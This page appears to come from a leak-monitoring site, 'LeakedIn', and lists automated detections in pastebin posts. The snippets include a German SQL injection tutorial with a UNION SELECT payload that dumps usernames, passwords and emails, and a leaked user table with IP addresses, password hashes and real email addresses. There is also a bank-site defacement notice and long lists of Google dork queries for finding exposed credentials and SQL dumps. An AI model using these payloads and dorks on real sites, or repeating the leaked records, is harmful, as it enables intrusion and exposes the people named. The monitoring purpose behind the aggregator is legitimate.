LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘Login/Password List’

Potential leak of data: Login/Password List

1 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

zu benutzten. Das sieht dann so aus:

http://www.site.de/news.php?id=-5 /**/UNION/**/SELECT/**/1,concat_ws(0x3a,username,password,email),3/**/FROM/**/users/*

Vorraussetzung ist, dass der Column eMail auch existiert.
Die Ausgabe sieht dann so aus:

Username:Password:eMail

Da es noch was wegen dem “and” gab.

http://www.site.de/news.php?id=5 and 1 = 0

Das and 1 = 0 fragt hier ob 1 = 0 ist. Da 1 != 0 ist, ist das also Falsch (false) und daher sollte wenn etwas vuln ist, auf der Page inhaltlich etwas fehlen oder eben 

Source: pastebin.com/raw.php?i=yFbpDvVZ

Potential leak of data: Login/Password List

2 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

bl_products 	
tbl_promotions 	
tbl_qualifications 	
tbl_regions 	
tbl_reports 	
tbl_search 	
tbl_sections 	
tbl_settings 	
tbl_shareholders 	
tbl_socialresponsibility 	
tbl_testimonies 	
tbl_users
Table: 	tbl_users
Total Rows: 	3

login_ip 	username 	password 	email
41.222.234.6 	regina.agyare 	24e32ad919445843e9ad899866ddb551 	info@infosapplabs.com
41.202.16.138 	iamdatiam 	fbac760679353cf2c4a153dc01a57ed4 	d.dombadoh@gmail.com
41.222.234.6 	treasury 	93bb9d1129af08e535130bbf7a6e9459 	admintreasury@infosapplabs.c

Detected 1 occurrence(s) of ‘[hH][aA4][cC][kK][eE3][dD] [bB][yY]’:

                www.fidelitybank.com.gh hacked by Rwandan hackers 
                      http://rwandan-hackers.blogspot.fr
                            TWITTER:@rwandanhackers
 
=================================================================

Target: http://www.fidelitybank.com.gh/
Host IP:184.1

Source: pastebin.com/raw.php?i=Hbvq0UrU

Potential leak of data: Login/Password List

1 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

=============
 - DaviantDigital - 
=======================================================

     Vulnerable link: 
      Injection used: 
     
         Dumped rows: X
        Size of dump: 

=======================================================
 Format(USERNAME:PASSWORD:EMAIL)
=======================================================

=======================================================
      - Don't underestimate, don't expect mercy -
=======================================================

Source: pastebin.com/raw.php?i=g4Pf9qW6

Potential leak of data: Login/Password List

1 votedvote

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

=============
 - DaviantDigital - 
=======================================================

     Vulnerable link: 
      Injection used: 
     
         Dumped rows: X
        Size of dump: 

=======================================================
 Format(USERNAME:PASSWORD:EMAIL)
=======================================================

=======================================================
      - Don't underestimate, don't expect mercy -
=======================================================

Source: pastebin.com/raw.php?i=DPrZqwDz

Potential leak of data: MySQL Connect Information

0 votedvote

Detected 2 occurrence(s) of ‘mysql_connect\([^\$]’:

"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "faile

Detected 1 occurrence(s) of ‘[ \t:=”‘]+[0-9a-f]{32}(?:[0-9a-f]{8})?’:

b Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
Please enter a valid password! inurl:polladmin
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / 

Detected 2 occurrence(s) of ‘enable secret’:

SWF
filetype:TXT TXT
filetype:XLS XLS
htpasswd / htpasswd.bak
Index of phpMyAdmin
index of: intext:Gallery in Configuration mode
index.of passlist
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"enable secret 5 $"
intext:"powered by Web Wiz Journal"
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password
intitle:"500 Internal Server Error"

Detected 1 occurrence(s) of ‘username[ \t:]+password[ \t:]+email’:

SER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of

Source: pastebin.com/raw.php?i=d3abSApS